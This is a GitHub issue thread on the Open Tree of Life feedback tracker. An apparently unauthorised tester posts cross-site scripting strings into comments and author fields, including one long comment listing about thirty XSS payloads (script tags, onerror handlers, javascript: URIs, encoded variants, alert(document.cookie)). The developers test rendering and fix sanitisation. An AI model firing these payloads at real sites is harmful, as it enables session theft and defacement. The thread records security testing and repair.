### ISSUE TITLE
script

### ISSUE THREAD

**Issue by opentreeapi** [OpenTreeOfLife/feedback#405]
hello <script>alert('xss')</script>

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [bob](mailto:bob@ku.edu) 
Upvotes   |   0 
URL   |   [tree.opentreeoflife.org/opentree/argus/opentree9.1@ott93302](https://tree.opentreeoflife.org/opentree/argus/opentree9.1@ott93302) 
Target node label   |   cellular organisms 
Synthetic tree id   |   opentree9.1 
Synthetic tree node id   |   ott93302 
Source tree id(s)   |    
Open Tree Taxonomy id   |    
Supporting reference   |   None

**Comment by opentreeapi** [comment]
Yo dog.<script>alert('xss')</script>

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez](mailto:rs@ku.edu) 
Upvotes   |   0

**Comment by opentreeapi** [comment]
More xSS

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez<a onmouseover="alert(document.cookie)">xxs link</a> ](mailto:rs@ku.edu) 
Upvotes   |   0

**Comment by opentreeapi** [comment]
Hi again <a onmouseover="alert(document.cookie)">xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> \";alert('XSS');// </script><script>alert('XSS');</script>

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez](mailto:bob@ku.edu) 
Upvotes   |   0

**Comment by jimallman** [comment]
@snacktavish: Any indication of whether these script-injection tests were successful? I thought we were using a safe HTML renderer here, but I could be wrong. If you're not sure, I'll try them on an obscure node and make any necessary fixes.

**Comment by snacktavish** [comment]
@jimallman yes! https://devtree.opentreeoflife.org/opentree/argus/opentree10.3@ott93302

**Comment by jimallman** [comment]
D'oh! I should have just followed the link. Do we know who this concerned citizen is? They've made their point, so it would be nice to stop. adding. more. of this junk.

**Comment by snacktavish** [comment]
I closed the issue on tree, so nothing happens there right now, but opened one as a comment myself on devtree to check.

**Comment by mtholder** [comment]
reopening to test...

**Comment by jimallman** [comment]
Simple test comment (haz markup?!)

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [Jim Allman](https://github.com/jimallman) 
Upvotes   |   0

**Comment by jimallman** [comment]
Testing again with **typical** markdown _stuff_.

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [Jim Allman](https://github.com/jimallman) 
Upvotes   |   0

**Comment by opentreeapi** [comment]
ricksanchez<a onmouseover="alert(document.cookie)">xxs link</a>

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez<a onmouseover="alert(document.cookie)">xxs link</a> ](mailto:rs@ku.edu) 
Upvotes   |   0

**Comment by opentreeapi** [comment]
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style> 
On Mouse Over​
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez](mailto:rs@ku.edu) 
Upvotes   |   0

**Comment by opentreeapi** [comment]
The tests were successful, very much so. Looks like the input sanitation is much better now. Was testing here because a colleague at KU was using these sites as an example of systems he was wanting to run locally. 

================================================
Metadata   |   Do not edit below this line
:------------|:----------
Author   |   [ricksanchez](mailto:advancedpersistenttacos@ku.edu) 
Upvotes   |   0
